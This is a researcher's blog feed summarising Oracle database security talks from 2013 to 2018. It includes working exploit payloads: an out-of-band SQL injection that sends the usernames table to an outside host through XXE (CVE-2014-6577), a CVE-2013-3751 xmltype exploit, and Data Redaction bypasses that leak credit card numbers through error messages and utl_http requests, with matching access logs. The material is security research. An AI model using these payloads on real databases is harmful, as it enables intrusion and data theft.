Alexander Kornbrust

Subscribe to Alexander Kornbrust feed
Oracle Security
Updated: 15 hours 41 min ago

DOAG 2018: Best of Oracle Security 2018

Sun, 2018-11-25 05:49

Last week I gave my yearly presentation “Best of Oracle Security 2018” at the DOAG 2018 conference in Nürnberg. In this presentation I talked about different Oracle exploits, a vulnerability in livesql.oracle.com, DNS data exfiltration in Oracle and how to audit SYSDBA connections in Oracle

 

Additionally I talked about the German DSGVO (GDPR) – „Wie wird die DSGVO umgesetzt und welche Lücken/Lügen gibt es?

.

DOAG 2015: Best of Oracle Security 2015

Thu, 2015-11-19 02:27

Yesterday I gave my yearly presentation “Best of Oracle Security 2015” at the DOAG 2015 conference in Nürnberg. In this presentation I showed different Oracle exploits I found/modified released in 2015 in various sources.

One of the most interesting Oracle bugs in 2015 was CVE-2014-6577 (found by Trustwave, affecting 11.2.0.3, 11.2.0.4, 12.1.0.1, 12.1.02, fixed in April 2015 CPU). This bug can be used as helper function in Out-of-band-SQL Injection attacks. Since Oracle 11g the way via utl_http/httpuritype was closed using the ACLs. This exploit opens the possibility in 11g/12g again (if patches are not applied).

—— Out-of-Band SQL Injection Example —————-

http://www.oraexploit.com/id=47′ or  1=extractvalue(xmltype(‘<?xml version=”1.0″ encoding=”UTF-8″?><!DOCTYPE root [ <!ENTITY % remote SYSTEM “http://192.168.83.1:8080/A=’||substr((select sys.stragg(distinct username||’-‘) as string from all_users),1,220)||'”> %remote; %param1;]>’),’/l’)

192.168.83.131 – – [18/Nov/2015 00:48:02]  “GET /A=ANONYMOUS-APEX_040200-APEX_PUBLIC_USER-APPQOSSYS-AUDSYS-C HTTP/1.0” 404 –

—— Out-of-Band SQL Injection Example —————-

Details about a critical design flaw (using unsalted MD5 as 12c password hash) in Oracle 12c will be published in another blog entry.

Oracle CPU July 2014 + Oracle Exploit CVE-2013-3751

Wed, 2014-07-16 11:03

Yesterday, Oracle released a new critical patch update (CPU Jul 2014) for July 2014. This CPU contains fixes for 5 database vulnerabilities. The most critical one, CVE-2013-3751, has a base score of 9.0 and affects Oracle 12.1 only. The same issue was already fixed for Oracle 11.2 in July 2013 (CPU Jul 2013).

After a short research on the web (google and twitter, less than 5 minutes) I found an exploit for the CVE-2013-3751.

This vulnerability was found by Nicolas Grégoire: He released an exploit nearly 1 year after the patch was published by Oracle. But it seems that he was not aware that Oracle forgot to fix this issue in Oracle 12.1

Timeline of CVE-2013-3751:

  • January 2012: Vulnerability found (fuzzing)
  • February 2012: Vulnerability reported to ZDI
  • March 2012: Vulnerability contracted $500
  • November 2012: Reported to Oracle by ZDI
  • July 2013: Patch published by Oracle
  • March 2014: Oracle’s Cloud still not patched
  • June 2014: Exploit released at INS#14 conference
  • July 2014: Patch for Oracle 12.1 published by Oracle

 

Exploit:

———-

select * from dual where xmltype(q'{<aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
abbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbcccccccccccccccccccccccccccccccccccccccccccccccc
ddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
ffffffffffffffffffffffffffffffffffffffffffffffffhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
iiiiiiiiiiiiiiiiiiiiiiiiii foo="bar[a &lt; b]"/>}') like '0wn3d_again';

———-

Best of Oracle Security 2013

Fri, 2013-11-22 01:51

I just uploaded my DOAG 2013 presentation „Best of Oracle Security 2013„.

 

This presentation shows how to bypass Oracle Data Redaction, become DBA using CREATE ANY INDEX, Hide information from Oracle Auding using VPD and more…

—————————————————

SQL> select * from scott.credit_card where 1=ordsys.ord_dicom.getmappingxpath((card_id),user,user);

ERROR at line 1:

ORA-53044: invalid tag: 1234-1234-1234-1234
ORA-06512: at „ORDSYS.ORDERROR“, line 5
ORA-06512: at „ORDSYS.ORD_DICOM_ADMIN_PRV“, line 1394
ORA-06512: at „ORDSYS.ORD_DICOM_ADMIN_PRV“, line 479
ORA-06512: at „ORDSYS.ORD_DICOM_ADMIN_PRV“, line 8232
ORA-06512: at „ORDSYS.ORD_DICOM“, line 756
ORA-06512: at line 1

 

or

 

select * from credit_card where 1=length(utl_http.request(‚http://192.168.2.102:8080/’||card_id));

==> bypassing the obfuscation because the utl_http.request is located in the where clause

 

——– output from access.log ————

192.168.2.101 – – [13/Sep/2013:15:19:20 Central Europe Daylight Time] „GET /1234-1234-1234-1234 HTTP/1.1″ 404 35 – –

192.168.2.101 – – [13/Sep/2013:15:19:20 Central Europe Daylight Time] „GET /5678-5678-5678-5678 HTTP/1.1″ 404 35 – –

——– output from access.log ————

—————————————————